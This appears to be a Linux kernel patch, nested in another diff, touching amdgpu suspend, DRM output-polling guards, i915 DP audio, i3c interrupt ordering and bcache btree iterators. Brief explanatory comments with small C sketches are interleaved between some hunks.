+-		ret = smu_cmn_send_smc_msg_with_param(smu, SMU_MSG_GfxDeviceDriverReset,
+-						      SMU_RESET_MODE_2, NULL);
+-		if (ret)
+-			return ret;
++	if (!en && !adev->in_s0ix) {
++		if (adev->in_s4) {
++			/* Add a GFX reset as a workaround just before sending the
++			 * MP1_UNLOAD message to prevent GC/RLC/PMFW from entering
++			 * an invalid state.
++			 */
++			ret = smu_cmn_send_smc_msg_with_param(smu, SMU_MSG_GfxDeviceDriverReset,
++							      SMU_RESET_MODE_2, NULL);
++			if (ret)
++				return ret;
++		}
+ 
+ 		ret = smu_cmn_send_smc_msg(smu, SMU_MSG_PrepareMp1ForUnload, NULL);
+ 	}
+diff --git a/drivers/gpu/drm/drm_modeset_helper.c b/drivers/gpu/drm/drm_modeset_helper.c
+index f858dfedf2cfc..2c582020cb423 100644
+--- a/drivers/gpu/drm/drm_modeset_helper.c
++++ b/drivers/gpu/drm/drm_modeset_helper.c
+@@ -193,13 +193,22 @@ int drm_mode_config_helper_suspend(struct drm_device *dev)
+ 
+ 	if (!dev)
+ 		return 0;
++	/*
++	 * Don't disable polling if it was never initialized
++	 */
++	if (dev->mode_config.poll_enabled)
++		drm_kms_helper_poll_disable(dev);
+ 
+-	drm_kms_helper_poll_disable(dev);
+ 	drm_fb_helper_set_suspend_unlocked(dev->fb_helper, 1);
+ 	state = drm_atomic_helper_suspend(dev);
+ 	if (IS_ERR(state)) {
+ 		drm_fb_helper_set_suspend_unlocked(dev->fb_helper, 0);
+-		drm_kms_helper_poll_enable(dev);
++		/*
++		 * Don't enable polling if it was never initialized
++		 */
++		if (dev->mode_config.poll_enabled)
++			drm_kms_helper_poll_enable(dev);
++
+ 		return PTR_ERR(state);
+ 	}
+ 
+@@ -239,7 +248,11 @@ int drm_mode_config_helper_resume(struct drm_device *dev)
+ 	dev->mode_config.suspend_state = NULL;
+ 
+ 	drm_fb_helper_set_suspend_unlocked(dev->fb_helper, 0);
+-	drm_kms_helper_poll_enable(dev);
++	/*
++	 * Don't enable polling if it is not initialized
++	 */
++	if (dev->mode_config.poll_enabled)
++		drm_kms_helper_poll_enable(dev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/drm_probe_helper.c b/drivers/gpu/drm/drm_probe_helper.c
+index 52dbaf74fe164..0e5eadc6d44de 100644
+--- a/drivers/gpu/drm/drm_probe_helper.c
++++ b/drivers/gpu/drm/drm_probe_helper.c
+@@ -235,6 +235,9 @@ drm_connector_mode_valid(struct drm_connector *connector,
+  * Drivers can call this helper from their device resume implementation. It is
+  * not an error to call this even when output polling isn't enabled.
+  *
++ * If device polling was never initialized, this call will trigger a
++ * warning and return.
++ *
+  * Note that calls to enable and disable polling must be strictly ordered, which
+  * is automatically the case when they're only called from suspend/resume
+  * callbacks.
+@@ -246,7 +249,8 @@ void drm_kms_helper_poll_enable(struct drm_device *dev)
+ 	struct drm_connector_list_iter conn_iter;
+ 	unsigned long delay = DRM_OUTPUT_POLL_PERIOD;
+ 
+-	if (!dev->mode_config.poll_enabled || !drm_kms_helper_poll)
++	if (drm_WARN_ON_ONCE(dev, !dev->mode_config.poll_enabled) ||
++	    !drm_kms_helper_poll || dev->mode_config.poll_running)
+ 		return;
+ 
+ 	drm_connector_list_iter_begin(dev, &conn_iter);
+@@ -570,7 +574,8 @@ int drm_helper_probe_single_connector_modes(struct drm_connector *connector,
+ 	}
+ 
+ 	/* Re-enable polling in case the global poll config changed. */
+-	if (drm_kms_helper_poll != dev->mode_config.poll_running)
++	if (dev->mode_config.poll_enabled &&
++	    (drm_kms_helper_poll != dev->mode_config.poll_running))
+ 		drm_kms_helper_poll_enable(dev);
+ 
+ 	dev->mode_config.poll_running = drm_kms_helper_poll;
+@@ -821,14 +826,18 @@ EXPORT_SYMBOL(drm_kms_helper_is_poll_worker);
+  * not an error to call this even when output polling isn't enabled or already
+  * disabled. Polling is re-enabled by calling drm_kms_helper_poll_enable().
+  *
++ * If, however, polling was never initialized, this call will trigger a
++ * warning and return.
++ *
+  * Note that calls to enable and disable polling must be strictly ordered, which
+  * is automatically the case when they're only called from suspend/resume
+  * callbacks.
+  */
+ void drm_kms_helper_poll_disable(struct drm_device *dev)
+ {
+-	if (!dev->mode_config.poll_enabled)
++	if (drm_WARN_ON(dev, !dev->mode_config.poll_enabled))
+ 		return;
++
+ 	cancel_delayed_work_sync(&dev->mode_config.output_poll_work);
+ }
+ EXPORT_SYMBOL(drm_kms_helper_poll_disable);
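Net effect of the drm_probe_helper changes: the poll enable/disable
helpers now WARN when polling was never initialized, so the checks move
to callers, as the drm_modeset_helper hunks above already do. A hedged
sketch of a driver-side suspend path under this contract:

#include <drm/drm_device.h>
#include <drm/drm_probe_helper.h>

static void my_suspend_polling(struct drm_device *dev)
{
	/* Gate on poll_enabled: calling the helper on a device that
	 * never set up output polling now triggers a WARN. */
	if (dev->mode_config.poll_enabled)
		drm_kms_helper_poll_disable(dev);
}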
+diff --git a/drivers/gpu/drm/i915/display/intel_audio.c b/drivers/gpu/drm/i915/display/intel_audio.c
+index aacbc6da84efa..a5fa0682110a2 100644
+--- a/drivers/gpu/drm/i915/display/intel_audio.c
++++ b/drivers/gpu/drm/i915/display/intel_audio.c
+@@ -73,19 +73,6 @@ struct intel_audio_funcs {
+ 				    const struct drm_connector_state *old_conn_state);
+ };
+ 
+-/* DP N/M table */
+-#define LC_810M	810000
+-#define LC_540M	540000
+-#define LC_270M	270000
+-#define LC_162M	162000
+-
+-struct dp_aud_n_m {
+-	int sample_rate;
+-	int clock;
+-	u16 m;
+-	u16 n;
+-};
+-
+ struct hdmi_aud_ncts {
+ 	int sample_rate;
+ 	int clock;
+@@ -93,60 +80,6 @@ struct hdmi_aud_ncts {
+ 	int cts;
+ };
+ 
+-/* Values according to DP 1.4 Table 2-104 */
+-static const struct dp_aud_n_m dp_aud_n_m[] = {
+-	{ 32000, LC_162M, 1024, 10125 },
+-	{ 44100, LC_162M, 784, 5625 },
+-	{ 48000, LC_162M, 512, 3375 },
+-	{ 64000, LC_162M, 2048, 10125 },
+-	{ 88200, LC_162M, 1568, 5625 },
+-	{ 96000, LC_162M, 1024, 3375 },
+-	{ 128000, LC_162M, 4096, 10125 },
+-	{ 176400, LC_162M, 3136, 5625 },
+-	{ 192000, LC_162M, 2048, 3375 },
+-	{ 32000, LC_270M, 1024, 16875 },
+-	{ 44100, LC_270M, 784, 9375 },
+-	{ 48000, LC_270M, 512, 5625 },
+-	{ 64000, LC_270M, 2048, 16875 },
+-	{ 88200, LC_270M, 1568, 9375 },
+-	{ 96000, LC_270M, 1024, 5625 },
+-	{ 128000, LC_270M, 4096, 16875 },
+-	{ 176400, LC_270M, 3136, 9375 },
+-	{ 192000, LC_270M, 2048, 5625 },
+-	{ 32000, LC_540M, 1024, 33750 },
+-	{ 44100, LC_540M, 784, 18750 },
+-	{ 48000, LC_540M, 512, 11250 },
+-	{ 64000, LC_540M, 2048, 33750 },
+-	{ 88200, LC_540M, 1568, 18750 },
+-	{ 96000, LC_540M, 1024, 11250 },
+-	{ 128000, LC_540M, 4096, 33750 },
+-	{ 176400, LC_540M, 3136, 18750 },
+-	{ 192000, LC_540M, 2048, 11250 },
+-	{ 32000, LC_810M, 1024, 50625 },
+-	{ 44100, LC_810M, 784, 28125 },
+-	{ 48000, LC_810M, 512, 16875 },
+-	{ 64000, LC_810M, 2048, 50625 },
+-	{ 88200, LC_810M, 1568, 28125 },
+-	{ 96000, LC_810M, 1024, 16875 },
+-	{ 128000, LC_810M, 4096, 50625 },
+-	{ 176400, LC_810M, 3136, 28125 },
+-	{ 192000, LC_810M, 2048, 16875 },
+-};
+-
+-static const struct dp_aud_n_m *
+-audio_config_dp_get_n_m(const struct intel_crtc_state *crtc_state, int rate)
+-{
+-	int i;
+-
+-	for (i = 0; i < ARRAY_SIZE(dp_aud_n_m); i++) {
+-		if (rate == dp_aud_n_m[i].sample_rate &&
+-		    crtc_state->port_clock == dp_aud_n_m[i].clock)
+-			return &dp_aud_n_m[i];
+-	}
+-
+-	return NULL;
+-}
+-
+ static const struct {
+ 	int clock;
+ 	u32 config;
+@@ -392,48 +325,17 @@ static void
+ hsw_dp_audio_config_update(struct intel_encoder *encoder,
+ 			   const struct intel_crtc_state *crtc_state)
+ {
+-	struct drm_i915_private *dev_priv = to_i915(encoder->base.dev);
+-	struct i915_audio_component *acomp = dev_priv->display.audio.component;
++	struct drm_i915_private *i915 = to_i915(encoder->base.dev);
+ 	enum transcoder cpu_transcoder = crtc_state->cpu_transcoder;
+-	enum port port = encoder->port;
+-	const struct dp_aud_n_m *nm;
+-	int rate;
+-	u32 tmp;
+ 
+-	rate = acomp ? acomp->aud_sample_rate[port] : 0;
+-	nm = audio_config_dp_get_n_m(crtc_state, rate);
+-	if (nm)
+-		drm_dbg_kms(&dev_priv->drm, "using Maud %u, Naud %u\n", nm->m,
+-			    nm->n);
+-	else
+-		drm_dbg_kms(&dev_priv->drm, "using automatic Maud, Naud\n");
+-
+-	tmp = intel_de_read(dev_priv, HSW_AUD_CFG(cpu_transcoder));
+-	tmp &= ~AUD_CONFIG_N_VALUE_INDEX;
+-	tmp &= ~AUD_CONFIG_PIXEL_CLOCK_HDMI_MASK;
+-	tmp &= ~AUD_CONFIG_N_PROG_ENABLE;
+-	tmp |= AUD_CONFIG_N_VALUE_INDEX;
+-
+-	if (nm) {
+-		tmp &= ~AUD_CONFIG_N_MASK;
+-		tmp |= AUD_CONFIG_N(nm->n);
+-		tmp |= AUD_CONFIG_N_PROG_ENABLE;
+-	}
+-
+-	intel_de_write(dev_priv, HSW_AUD_CFG(cpu_transcoder), tmp);
+-
+-	tmp = intel_de_read(dev_priv, HSW_AUD_M_CTS_ENABLE(cpu_transcoder));
+-	tmp &= ~AUD_CONFIG_M_MASK;
+-	tmp &= ~AUD_M_CTS_M_VALUE_INDEX;
+-	tmp &= ~AUD_M_CTS_M_PROG_ENABLE;
+-
+-	if (nm) {
+-		tmp |= nm->m;
+-		tmp |= AUD_M_CTS_M_VALUE_INDEX;
+-		tmp |= AUD_M_CTS_M_PROG_ENABLE;
+-	}
+-
+-	intel_de_write(dev_priv, HSW_AUD_M_CTS_ENABLE(cpu_transcoder), tmp);
++	/* Enable time stamps. Let HW calculate Maud/Naud values */
++	intel_de_rmw(i915, HSW_AUD_CFG(cpu_transcoder),
++		     AUD_CONFIG_N_VALUE_INDEX |
++		     AUD_CONFIG_PIXEL_CLOCK_HDMI_MASK |
++		     AUD_CONFIG_UPPER_N_MASK |
++		     AUD_CONFIG_LOWER_N_MASK |
++		     AUD_CONFIG_N_PROG_ENABLE,
++		     AUD_CONFIG_N_VALUE_INDEX);
+ }
+ 
+ static void
+diff --git a/drivers/hwtracing/intel_th/pci.c b/drivers/hwtracing/intel_th/pci.c
+index 147d338c191e7..648893f9e4b67 100644
+--- a/drivers/hwtracing/intel_th/pci.c
++++ b/drivers/hwtracing/intel_th/pci.c
+@@ -289,6 +289,11 @@ static const struct pci_device_id intel_th_pci_id_table[] = {
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x7e24),
+ 		.driver_data = (kernel_ulong_t)&intel_th_2x,
+ 	},
++	{
++		/* Meteor Lake-S CPU */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0xae24),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
+ 	{
+ 		/* Raptor Lake-S */
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x7a26),
+diff --git a/drivers/i3c/master/svc-i3c-master.c b/drivers/i3c/master/svc-i3c-master.c
+index f30d457e91196..e71c90e5ac60c 100644
+--- a/drivers/i3c/master/svc-i3c-master.c
++++ b/drivers/i3c/master/svc-i3c-master.c
+@@ -397,6 +397,19 @@ static void svc_i3c_master_ibi_work(struct work_struct *work)
+ 	int ret;
+ 
+ 	mutex_lock(&master->lock);
++	/*
++	 * IBIWON may be set before SVC_I3C_MCTRL_REQUEST_AUTO_IBI, causing
++	 * readl_relaxed_poll_timeout() to return immediately. Consequently,
++	 * ibitype will be 0 since it was last updated only after the 8th SCL
++	 * cycle, leading to missed client IBI handlers.
++	 *
++	 * A typical scenario is when IBIWON occurs and bus arbitration is lost
++	 * at svc_i3c_master_priv_xfers().
++	 *
++	 * Clear SVC_I3C_MINT_IBIWON before sending SVC_I3C_MCTRL_REQUEST_AUTO_IBI.
++	 */
++	writel(SVC_I3C_MINT_IBIWON, master->regs + SVC_I3C_MSTATUS);
++
+ 	/* Acknowledge the incoming interrupt with the AUTOIBI mechanism */
+ 	writel(SVC_I3C_MCTRL_REQUEST_AUTO_IBI |
+ 	       SVC_I3C_MCTRL_IBIRESP_AUTO,
+@@ -411,9 +424,6 @@ static void svc_i3c_master_ibi_work(struct work_struct *work)
+ 		goto reenable_ibis;
+ 	}
+ 
+-	/* Clear the interrupt status */
+-	writel(SVC_I3C_MINT_IBIWON, master->regs + SVC_I3C_MSTATUS);
+-
+ 	status = readl(master->regs + SVC_I3C_MSTATUS);
+ 	ibitype = SVC_I3C_MSTATUS_IBITYPE(status);
+ 	ibiaddr = SVC_I3C_MSTATUS_IBIADDR(status);
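The svc-i3c reordering is the general latched-status rule: clear the
event bit before arming the request that will be polled on it, or a
stale bit satisfies the poll while the event's side data is still
invalid. Shape of the sequence, with hypothetical REG_* and bit names:

#include <linux/bits.h>
#include <linux/io.h>
#include <linux/iopoll.h>

#define REG_STATUS	0x00		/* hypothetical offsets/bits */
#define REG_CTRL	0x04
#define STAT_EVENT	BIT(0)
#define REQ_AUTO	BIT(1)
#define RESP_AUTO	BIT(2)

static int arm_auto_event(void __iomem *base)
{
	u32 val;

	writel(STAT_EVENT, base + REG_STATUS);		/* clear stale latch */
	writel(REQ_AUTO | RESP_AUTO, base + REG_CTRL);	/* then arm request */

	/* A set STAT_EVENT now really belongs to the new event. */
	return readl_relaxed_poll_timeout(base + REG_STATUS, val,
					  val & STAT_EVENT, 0, 1000);
}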
+diff --git a/drivers/md/bcache/bset.c b/drivers/md/bcache/bset.c
+index 2bba4d6aaaa28..463eb13bd0b2a 100644
+--- a/drivers/md/bcache/bset.c
++++ b/drivers/md/bcache/bset.c
+@@ -54,7 +54,7 @@ void bch_dump_bucket(struct btree_keys *b)
+ int __bch_count_data(struct btree_keys *b)
+ {
+ 	unsigned int ret = 0;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct bkey *k;
+ 
+ 	if (b->ops->is_extents)
+@@ -67,7 +67,7 @@ void __bch_check_keys(struct btree_keys *b, const char *fmt, ...)
+ {
+ 	va_list args;
+ 	struct bkey *k, *p = NULL;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	const char *err;
+ 
+ 	for_each_key(b, k, &iter) {
+@@ -879,7 +879,7 @@ unsigned int bch_btree_insert_key(struct btree_keys *b, struct bkey *k,
+ 	unsigned int status = BTREE_INSERT_STATUS_NO_INSERT;
+ 	struct bset *i = bset_tree_last(b)->data;
+ 	struct bkey *m, *prev = NULL;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct bkey preceding_key_on_stack = ZERO_KEY;
+ 	struct bkey *preceding_key_p = &preceding_key_on_stack;
+ 
+@@ -895,9 +895,9 @@ unsigned int bch_btree_insert_key(struct btree_keys *b, struct bkey *k,
+ 	else
+ 		preceding_key(k, &preceding_key_p);
+ 
+-	m = bch_btree_iter_init(b, &iter, preceding_key_p);
++	m = bch_btree_iter_stack_init(b, &iter, preceding_key_p);
+ 
+-	if (b->ops->insert_fixup(b, k, &iter, replace_key))
++	if (b->ops->insert_fixup(b, k, &iter.iter, replace_key))
+ 		return status;
+ 
+ 	status = BTREE_INSERT_STATUS_INSERT;
+@@ -1100,33 +1100,33 @@ void bch_btree_iter_push(struct btree_iter *iter, struct bkey *k,
+ 				 btree_iter_cmp));
+ }
+ 
+-static struct bkey *__bch_btree_iter_init(struct btree_keys *b,
+-					  struct btree_iter *iter,
+-					  struct bkey *search,
+-					  struct bset_tree *start)
++static struct bkey *__bch_btree_iter_stack_init(struct btree_keys *b,
++						struct btree_iter_stack *iter,
++						struct bkey *search,
++						struct bset_tree *start)
+ {
+ 	struct bkey *ret = NULL;
+ 
+-	iter->size = ARRAY_SIZE(iter->data);
+-	iter->used = 0;
++	iter->iter.size = ARRAY_SIZE(iter->stack_data);
++	iter->iter.used = 0;
+ 
+ #ifdef CONFIG_BCACHE_DEBUG
+-	iter->b = b;
++	iter->iter.b = b;
+ #endif
+ 
+ 	for (; start <= bset_tree_last(b); start++) {
+ 		ret = bch_bset_search(b, start, search);
+-		bch_btree_iter_push(iter, ret, bset_bkey_last(start->data));
++		bch_btree_iter_push(&iter->iter, ret, bset_bkey_last(start->data));
+ 	}
+ 
+ 	return ret;
+ }
+ 
+-struct bkey *bch_btree_iter_init(struct btree_keys *b,
+-				 struct btree_iter *iter,
++struct bkey *bch_btree_iter_stack_init(struct btree_keys *b,
++				 struct btree_iter_stack *iter,
+ 				 struct bkey *search)
+ {
+-	return __bch_btree_iter_init(b, iter, search, b->set);
++	return __bch_btree_iter_stack_init(b, iter, search, b->set);
+ }
+ 
+ static inline struct bkey *__bch_btree_iter_next(struct btree_iter *iter,
+@@ -1293,10 +1293,10 @@ void bch_btree_sort_partial(struct btree_keys *b, unsigned int start,
+ 			    struct bset_sort_state *state)
+ {
+ 	size_t order = b->page_order, keys = 0;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	int oldsize = bch_count_data(b);
+ 
+-	__bch_btree_iter_init(b, &iter, NULL, &b->set[start]);
++	__bch_btree_iter_stack_init(b, &iter, NULL, &b->set[start]);
+ 
+ 	if (start) {
+ 		unsigned int i;
+@@ -1307,7 +1307,7 @@ void bch_btree_sort_partial(struct btree_keys *b, unsigned int start,
+ 		order = get_order(__set_bytes(b->set->data, keys));
+ 	}
+ 
+-	__btree_sort(b, &iter, start, order, false, state);
++	__btree_sort(b, &iter.iter, start, order, false, state);
+ 
+ 	EBUG_ON(oldsize >= 0 && bch_count_data(b) != oldsize);
+ }
+@@ -1323,11 +1323,11 @@ void bch_btree_sort_into(struct btree_keys *b, struct btree_keys *new,
+ 			 struct bset_sort_state *state)
+ {
+ 	uint64_t start_time = local_clock();
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 
+-	bch_btree_iter_init(b, &iter, NULL);
++	bch_btree_iter_stack_init(b, &iter, NULL);
+ 
+-	btree_mergesort(b, new->set->data, &iter, false, true);
++	btree_mergesort(b, new->set->data, &iter.iter, false, true);
+ 
+ 	bch_time_stats_update(&state->time, start_time);
+ 
+diff --git a/drivers/md/bcache/bset.h b/drivers/md/bcache/bset.h
+index d795c84246b01..011f6062c4c04 100644
+--- a/drivers/md/bcache/bset.h
++++ b/drivers/md/bcache/bset.h
+@@ -321,7 +321,14 @@ struct btree_iter {
+ #endif
+ 	struct btree_iter_set {
+ 		struct bkey *k, *end;
+-	} data[MAX_BSETS];
++	} data[];
++};
++
++/* Fixed-size btree_iter that can be allocated on the stack */
++
++struct btree_iter_stack {
++	struct btree_iter iter;
++	struct btree_iter_set stack_data[MAX_BSETS];
+ };
+ 
+ typedef bool (*ptr_filter_fn)(struct btree_keys *b, const struct bkey *k);
+@@ -333,9 +340,9 @@ struct bkey *bch_btree_iter_next_filter(struct btree_iter *iter,
+ 
+ void bch_btree_iter_push(struct btree_iter *iter, struct bkey *k,
+ 			 struct bkey *end);
+-struct bkey *bch_btree_iter_init(struct btree_keys *b,
+-				 struct btree_iter *iter,
+-				 struct bkey *search);
++struct bkey *bch_btree_iter_stack_init(struct btree_keys *b,
++				       struct btree_iter_stack *iter,
++				       struct bkey *search);
+ 
+ struct bkey *__bch_bset_search(struct btree_keys *b, struct bset_tree *t,
+ 			       const struct bkey *search);
+@@ -350,13 +357,14 @@ static inline struct bkey *bch_bset_search(struct btree_keys *b,
+ 	return search ? __bch_bset_search(b, t, search) : t->data->start;
+ }
+ 
+-#define for_each_key_filter(b, k, iter, filter)				\
+-	for (bch_btree_iter_init((b), (iter), NULL);			\
+-	     ((k) = bch_btree_iter_next_filter((iter), (b), filter));)
++#define for_each_key_filter(b, k, stack_iter, filter)                      \
++	for (bch_btree_iter_stack_init((b), (stack_iter), NULL);           \
++	     ((k) = bch_btree_iter_next_filter(&((stack_iter)->iter), (b), \
++					       filter));)
+ 
+-#define for_each_key(b, k, iter)					\
+-	for (bch_btree_iter_init((b), (iter), NULL);			\
+-	     ((k) = bch_btree_iter_next(iter));)
++#define for_each_key(b, k, stack_iter)                           \
++	for (bch_btree_iter_stack_init((b), (stack_iter), NULL); \
++	     ((k) = bch_btree_iter_next(&((stack_iter)->iter)));)
+ 
+ /* Sorting */
+ 
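The bset.h change converts the fixed data[MAX_BSETS] array into a
flexible array member and adds an on-stack wrapper, so heap users can
size the iterator exactly (see the super.c hunk below) while stack
users keep bounded storage. A userspace sketch of the layout trick;
note that embedding a struct ending in a flexible array member is a
GNU C extension, which the kernel relies on:

#include <stdio.h>
#include <stdlib.h>

struct set { int *k, *end; };

struct iter {
	size_t size, used;
	struct set data[];		/* flexible array member */
};

struct iter_stack {
	struct iter iter;
	struct set stack_data[4];	/* MAX_BSETS analogue: backs iter.data */
};

int main(void)
{
	struct iter_stack s = { .iter = { .size = 4 } };
	size_t heap_bytes = sizeof(struct iter) + 8 * sizeof(struct set);
	struct iter *it = malloc(heap_bytes);	/* exact-size heap user */

	if (!it)
		return 1;
	s.iter.data[0].k = NULL;	/* lands in s.stack_data[0] */
	printf("heap iter for 8 sets: %zu bytes\n", heap_bytes);
	free(it);
	return 0;
}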
+diff --git a/drivers/md/bcache/btree.c b/drivers/md/bcache/btree.c
+index 6a2f57ae0f3c2..d680c810e5e12 100644
+--- a/drivers/md/bcache/btree.c
++++ b/drivers/md/bcache/btree.c
+@@ -1283,7 +1283,7 @@ static bool btree_gc_mark_node(struct btree *b, struct gc_stat *gc)
+ 	uint8_t stale = 0;
+ 	unsigned int keys = 0, good_keys = 0;
+ 	struct bkey *k;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct bset_tree *t;
+ 
+ 	gc->nodes++;
+@@ -1544,7 +1544,7 @@ static int btree_gc_rewrite_node(struct btree *b, struct btree_op *op,
+ static unsigned int btree_gc_count_keys(struct btree *b)
+ {
+ 	struct bkey *k;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	unsigned int ret = 0;
+ 
+ 	for_each_key_filter(&b->keys, k, &iter, bch_ptr_bad)
+@@ -1585,17 +1585,18 @@ static int btree_gc_recurse(struct btree *b, struct btree_op *op,
+ 	int ret = 0;
+ 	bool should_rewrite;
+ 	struct bkey *k;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct gc_merge_info r[GC_MERGE_NODES];
+ 	struct gc_merge_info *i, *last = r + ARRAY_SIZE(r) - 1;
+ 
+-	bch_btree_iter_init(&b->keys, &iter, &b->c->gc_done);
++	bch_btree_iter_stack_init(&b->keys, &iter, &b->c->gc_done);
+ 
+ 	for (i = r; i < r + ARRAY_SIZE(r); i++)
+ 		i->b = ERR_PTR(-EINTR);
+ 
+ 	while (1) {
+-		k = bch_btree_iter_next_filter(&iter, &b->keys, bch_ptr_bad);
++		k = bch_btree_iter_next_filter(&iter.iter, &b->keys,
++					       bch_ptr_bad);
+ 		if (k) {
+ 			r->b = bch_btree_node_get(b->c, op, k, b->level - 1,
+ 						  true, b);
+@@ -1885,7 +1886,7 @@ static int bch_btree_check_recurse(struct btree *b, struct btree_op *op)
+ {
+ 	int ret = 0;
+ 	struct bkey *k, *p = NULL;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 
+ 	for_each_key_filter(&b->keys, k, &iter, bch_ptr_invalid)
+ 		bch_initial_mark_key(b->c, b->level, k);
+@@ -1893,10 +1894,10 @@ static int bch_btree_check_recurse(struct btree *b, struct btree_op *op)
+ 	bch_initial_mark_key(b->c, b->level + 1, &b->key);
+ 
+ 	if (b->level) {
+-		bch_btree_iter_init(&b->keys, &iter, NULL);
++		bch_btree_iter_stack_init(&b->keys, &iter, NULL);
+ 
+ 		do {
+-			k = bch_btree_iter_next_filter(&iter, &b->keys,
++			k = bch_btree_iter_next_filter(&iter.iter, &b->keys,
+ 						       bch_ptr_bad);
+ 			if (k) {
+ 				btree_node_prefetch(b, k);
+@@ -1924,7 +1925,7 @@ static int bch_btree_check_thread(void *arg)
+ 	struct btree_check_info *info = arg;
+ 	struct btree_check_state *check_state = info->state;
+ 	struct cache_set *c = check_state->c;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct bkey *k, *p;
+ 	int cur_idx, prev_idx, skip_nr;
+ 
+@@ -1933,8 +1934,8 @@ static int bch_btree_check_thread(void *arg)
+ 	ret = 0;
+ 
+ 	/* root node keys are checked before thread created */
+-	bch_btree_iter_init(&c->root->keys, &iter, NULL);
+-	k = bch_btree_iter_next_filter(&iter, &c->root->keys, bch_ptr_bad);
++	bch_btree_iter_stack_init(&c->root->keys, &iter, NULL);
++	k = bch_btree_iter_next_filter(&iter.iter, &c->root->keys, bch_ptr_bad);
+ 	BUG_ON(!k);
+ 
+ 	p = k;
+@@ -1952,7 +1953,7 @@ static int bch_btree_check_thread(void *arg)
+ 		skip_nr = cur_idx - prev_idx;
+ 
+ 		while (skip_nr) {
+-			k = bch_btree_iter_next_filter(&iter,
++			k = bch_btree_iter_next_filter(&iter.iter,
+ 						       &c->root->keys,
+ 						       bch_ptr_bad);
+ 			if (k)
+@@ -2025,7 +2026,7 @@ int bch_btree_check(struct cache_set *c)
+ 	int ret = 0;
+ 	int i;
+ 	struct bkey *k = NULL;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct btree_check_state check_state;
+ 
+ 	/* check and mark root node keys */
+@@ -2521,11 +2522,11 @@ static int bch_btree_map_nodes_recurse(struct btree *b, struct btree_op *op,
+ 
+ 	if (b->level) {
+ 		struct bkey *k;
+-		struct btree_iter iter;
++		struct btree_iter_stack iter;
+ 
+-		bch_btree_iter_init(&b->keys, &iter, from);
++		bch_btree_iter_stack_init(&b->keys, &iter, from);
+ 
+-		while ((k = bch_btree_iter_next_filter(&iter, &b->keys,
++		while ((k = bch_btree_iter_next_filter(&iter.iter, &b->keys,
+ 						       bch_ptr_bad))) {
+ 			ret = bcache_btree(map_nodes_recurse, k, b,
+ 				    op, from, fn, flags);
+@@ -2554,11 +2555,12 @@ int bch_btree_map_keys_recurse(struct btree *b, struct btree_op *op,
+ {
+ 	int ret = MAP_CONTINUE;
+ 	struct bkey *k;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 
+-	bch_btree_iter_init(&b->keys, &iter, from);
++	bch_btree_iter_stack_init(&b->keys, &iter, from);
+ 
+-	while ((k = bch_btree_iter_next_filter(&iter, &b->keys, bch_ptr_bad))) {
++	while ((k = bch_btree_iter_next_filter(&iter.iter, &b->keys,
++					       bch_ptr_bad))) {
+ 		ret = !b->level
+ 			? fn(op, b, k)
+ 			: bcache_btree(map_keys_recurse, k,
+diff --git a/drivers/md/bcache/super.c b/drivers/md/bcache/super.c
+index 70e5bd8961d2f..659f6777b9737 100644
+--- a/drivers/md/bcache/super.c
++++ b/drivers/md/bcache/super.c
+@@ -1915,8 +1915,9 @@ struct cache_set *bch_cache_set_alloc(struct cache_sb *sb)
+ 	INIT_LIST_HEAD(&c->btree_cache_freed);
+ 	INIT_LIST_HEAD(&c->data_buckets);
+ 
+-	iter_size = ((meta_bucket_pages(sb) * PAGE_SECTORS) / sb->block_size + 1) *
+-		sizeof(struct btree_iter_set);
++	iter_size = sizeof(struct btree_iter) +
++		    ((meta_bucket_pages(sb) * PAGE_SECTORS) / sb->block_size) *
++			    sizeof(struct btree_iter_set);
+ 
+ 	c->devices = kcalloc(c->nr_uuids, sizeof(void *), GFP_KERNEL);
+ 	if (!c->devices)
+diff --git a/drivers/md/bcache/sysfs.c b/drivers/md/bcache/sysfs.c
+index 025fe6479bb68..15749ba958c80 100644
+--- a/drivers/md/bcache/sysfs.c
++++ b/drivers/md/bcache/sysfs.c
+@@ -660,7 +660,7 @@ static unsigned int bch_root_usage(struct cache_set *c)
+ 	unsigned int bytes = 0;
+ 	struct bkey *k;
+ 	struct btree *b;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 
+ 	goto lock_root;
+ 
+diff --git a/drivers/md/bcache/writeback.c b/drivers/md/bcache/writeback.c
+index 18c6e0d2877b5..6081dc6fd0132 100644
+--- a/drivers/md/bcache/writeback.c
++++ b/drivers/md/bcache/writeback.c
+@@ -908,15 +908,15 @@ static int bch_dirty_init_thread(void *arg)
+ 	struct dirty_init_thrd_info *info = arg;
+ 	struct bch_dirty_init_state *state = info->state;
+ 	struct cache_set *c = state->c;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct bkey *k, *p;
+ 	int cur_idx, prev_idx, skip_nr;
+ 
+ 	k = p = NULL;
+ 	prev_idx = 0;
+ 
+-	bch_btree_iter_init(&c->root->keys, &iter, NULL);
+-	k = bch_btree_iter_next_filter(&iter, &c->root->keys, bch_ptr_bad);
++	bch_btree_iter_stack_init(&c->root->keys, &iter, NULL);
++	k = bch_btree_iter_next_filter(&iter.iter, &c->root->keys, bch_ptr_bad);
+ 	BUG_ON(!k);
+ 
+ 	p = k;
+@@ -930,7 +930,7 @@ static int bch_dirty_init_thread(void *arg)
+ 		skip_nr = cur_idx - prev_idx;
+ 
+ 		while (skip_nr) {
+-			k = bch_btree_iter_next_filter(&iter,
++			k = bch_btree_iter_next_filter(&iter.iter,
+ 						       &c->root->keys,
+ 						       bch_ptr_bad);
+ 			if (k)
